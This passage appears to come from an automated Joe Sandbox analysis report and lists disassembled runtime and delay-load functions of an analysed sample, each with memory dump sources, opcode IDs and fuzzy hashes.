                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: DloadProtectSection
                                                                  • String ID:
                                                                  • API String ID: 2203082970-0
                                                                  • Opcode ID: a8e96b172e66876d511c23ef808eb136270593af7e00a2c6dfff28116a948a6c
                                                                  • Instruction ID: 0058d34b90923a085067517af941132cae4971e00121ebe9731de55e2134473d
                                                                  • Opcode Fuzzy Hash: a8e96b172e66876d511c23ef808eb136270593af7e00a2c6dfff28116a948a6c
                                                                  • Instruction Fuzzy Hash: E2D0C7791801409BD701EBD7989575537E47324705FE00927B14592561F66C54428A1F
                                                                  Function 004598BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileType.KERNELBASE(000000FF,004597BE), ref: 004598C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID:
                                                                  • API String ID: 3081899298-0
                                                                  • Opcode ID: c040a3644c40801f68c3389ba07ebb1cfab8391f10b2f669391fe7b54ddc667b
                                                                  • Instruction ID: 6cd980c8cecad77c5b219c27f4d854dd8988a1689f1e30b66d941d4097d4f3ed
                                                                  • Opcode Fuzzy Hash: c040a3644c40801f68c3389ba07ebb1cfab8391f10b2f669391fe7b54ddc667b
                                                                  • Instruction Fuzzy Hash: 38C01234410205D58E206A24984809B7311AA533677B48695C4288A1A2C32ACC4FEB05
                                                                  Function 0046E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 98d3422056efac69cd31c6fd1f064f718e3501f413efd212577555f23eefa8dd
                                                                  • Instruction ID: 8eddc0d25f93eef336f03f83eec9b497855b800a570ae7fbafaafaa078b40f18
                                                                  • Opcode Fuzzy Hash: 98d3422056efac69cd31c6fd1f064f718e3501f413efd212577555f23eefa8dd
                                                                  • Instruction Fuzzy Hash: D7B012E9258000BC3144B1071D42D3B028CC4C1B11330C43FFC04E3180F84C4C460A3F
                                                                  Function 0046E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: ea1b94cf25e46546fc29c7bb37bec4188de8436ab3c70a3c889df25653d47167
                                                                  • Instruction ID: 410d6bf7c96c76df2c256fe54f0e974efcac577eb97339549b416adedb7e4de5
                                                                  • Opcode Fuzzy Hash: ea1b94cf25e46546fc29c7bb37bec4188de8436ab3c70a3c889df25653d47167
                                                                  • Instruction Fuzzy Hash: 04B092A92980006C214471071A42D7A0288C581B11330C42FB904E2180B8480C4A093B
                                                                  Function 0046E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 067d0137533a1d21b3641705f21f7dc5ed0948437c54cf929043eae66edc6804
                                                                  • Instruction ID: 4f9710760621ab5ce3492adf62081c282035a5789b846820f0b4eef974599762
                                                                  • Opcode Fuzzy Hash: 067d0137533a1d21b3641705f21f7dc5ed0948437c54cf929043eae66edc6804
                                                                  • Instruction Fuzzy Hash: 5BB092A9258000BC2144B10B1902D3A0298C880B11330842FB804E2181F84C4E42093B
                                                                  Function 0046E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 3d453c44465b91286b36f3ba25b012a4a66b930a9c9ebb84bbdaa3432d31f47d
                                                                  • Instruction ID: 422c2cfd0e358da69dc4d92f466a552609e162984f5202eb6889bbd30f05c711
                                                                  • Opcode Fuzzy Hash: 3d453c44465b91286b36f3ba25b012a4a66b930a9c9ebb84bbdaa3432d31f47d
                                                                  • Instruction Fuzzy Hash: A3B012C92580007D3144719B1C02D3B018CC0C0B15330843FF405C3080F85C0C01193F
                                                                  Function 0046E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: c6f07bcbb2bd583fbe9740a3e19d69e3bc647bb6caa774bdd36830c71b7a667b
                                                                  • Instruction ID: 61c26ea2e6db9d69175043c3970a252f1adddd4ad69853dfdd28feade8262c1a
                                                                  • Opcode Fuzzy Hash: c6f07bcbb2bd583fbe9740a3e19d69e3bc647bb6caa774bdd36830c71b7a667b
                                                                  • Instruction Fuzzy Hash: B0B012C9298000BC3144719B5D02D3B019CC0C0B15330863FF405D3080FC4C0D02193F
                                                                  Function 0046E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: aff9e2a5dd51752b327c0611158363de38604a140c401e861a5fea92448927fc
                                                                  • Instruction ID: e6ca49297ebbe43c78c94f944c945ede94671bac307998176a1847b9c78cea77
                                                                  • Opcode Fuzzy Hash: aff9e2a5dd51752b327c0611158363de38604a140c401e861a5fea92448927fc
                                                                  • Instruction Fuzzy Hash: EEB012C9258100BC3184719B5C03D3B019CC0C0B15330863FF405C3080F84C1C41193F
                                                                  Function 0046E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 835fda0b8988dd8efff02834fdad8f951a5f61bb0ce50d12dc4d1b2483ff4981
                                                                  • Instruction ID: ca098169ed10e9769e2ab16ab392fc6b17108f132c7a07a78ac584c7bfbf4dfd
                                                                  • Opcode Fuzzy Hash: 835fda0b8988dd8efff02834fdad8f951a5f61bb0ce50d12dc4d1b2483ff4981
                                                                  • Instruction Fuzzy Hash: 3AA001EA2A91527D314872536E46D3B029DC4C1B29330992FF825B6581BC981C86197B
                                                                  Function 0046E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: eba550a6852e6bffa2a0bc5fe63363176437a4de26837fcc1d5fdde993f37cfe
                                                                  • Instruction ID: a12a309025346433f0b1c6f87b636b213ade810415f6b0e7c43dba1d9df738e2
                                                                  • Opcode Fuzzy Hash: eba550a6852e6bffa2a0bc5fe63363176437a4de26837fcc1d5fdde993f37cfe
                                                                  • Instruction Fuzzy Hash: 44A001EA2A9152BC314872536E46D3B029DC4C5B65330992FF816A6581B8981C86197B
                                                                  Function 0046E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 2d3cadd96d0b3066af9b1aa96bf6936e82dd93b757039411f27cfb70c49a50ce
                                                                  • Instruction ID: a12a309025346433f0b1c6f87b636b213ade810415f6b0e7c43dba1d9df738e2
                                                                  • Opcode Fuzzy Hash: 2d3cadd96d0b3066af9b1aa96bf6936e82dd93b757039411f27cfb70c49a50ce
                                                                  • Instruction Fuzzy Hash: 44A001EA2A9152BC314872536E46D3B029DC4C5B65330992FF816A6581B8981C86197B
                                                                  Function 0046E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 742de464396ddc132505b7eff3e8b4b71d09ab137f2059c5ca31032b66bfebd6
                                                                  • Instruction ID: a12a309025346433f0b1c6f87b636b213ade810415f6b0e7c43dba1d9df738e2
                                                                  • Opcode Fuzzy Hash: 742de464396ddc132505b7eff3e8b4b71d09ab137f2059c5ca31032b66bfebd6
                                                                  • Instruction Fuzzy Hash: 44A001EA2A9152BC314872536E46D3B029DC4C5B65330992FF816A6581B8981C86197B
                                                                  Function 0046E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 80b0c4646c1b0cb747efa43ef1c32e2589f93ddb575ec48d2dda55ed03a56990
                                                                  • Instruction ID: a12a309025346433f0b1c6f87b636b213ade810415f6b0e7c43dba1d9df738e2
                                                                  • Opcode Fuzzy Hash: 80b0c4646c1b0cb747efa43ef1c32e2589f93ddb575ec48d2dda55ed03a56990
                                                                  • Instruction Fuzzy Hash: 44A001EA2A9152BC314872536E46D3B029DC4C5B65330992FF816A6581B8981C86197B
                                                                  Function 0046E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: bc9069e05921f8979e51e51668ee086a85e69a740cafa41cb04ab824be8e737a
                                                                  • Instruction ID: a12a309025346433f0b1c6f87b636b213ade810415f6b0e7c43dba1d9df738e2
                                                                  • Opcode Fuzzy Hash: bc9069e05921f8979e51e51668ee086a85e69a740cafa41cb04ab824be8e737a
                                                                  • Instruction Fuzzy Hash: 44A001EA2A9152BC314872536E46D3B029DC4C5B65330992FF816A6581B8981C86197B
                                                                  Function 0046E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: bfe257fca6930877ee50143faf6bcf5600235e2af8e84dffd865ffbf347d76fe
                                                                  • Instruction ID: 12116eaaee2b38ef11b4581da9ba229b9fdf2506e80aec038f3b874c5a64a61b
                                                                  • Opcode Fuzzy Hash: bfe257fca6930877ee50143faf6bcf5600235e2af8e84dffd865ffbf347d76fe
                                                                  • Instruction Fuzzy Hash: 83A011CA2A80003C300832A32C02C3B028CC0C0B2A3308A2FF802A2080B8880C02283F
                                                                  Function 0046E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
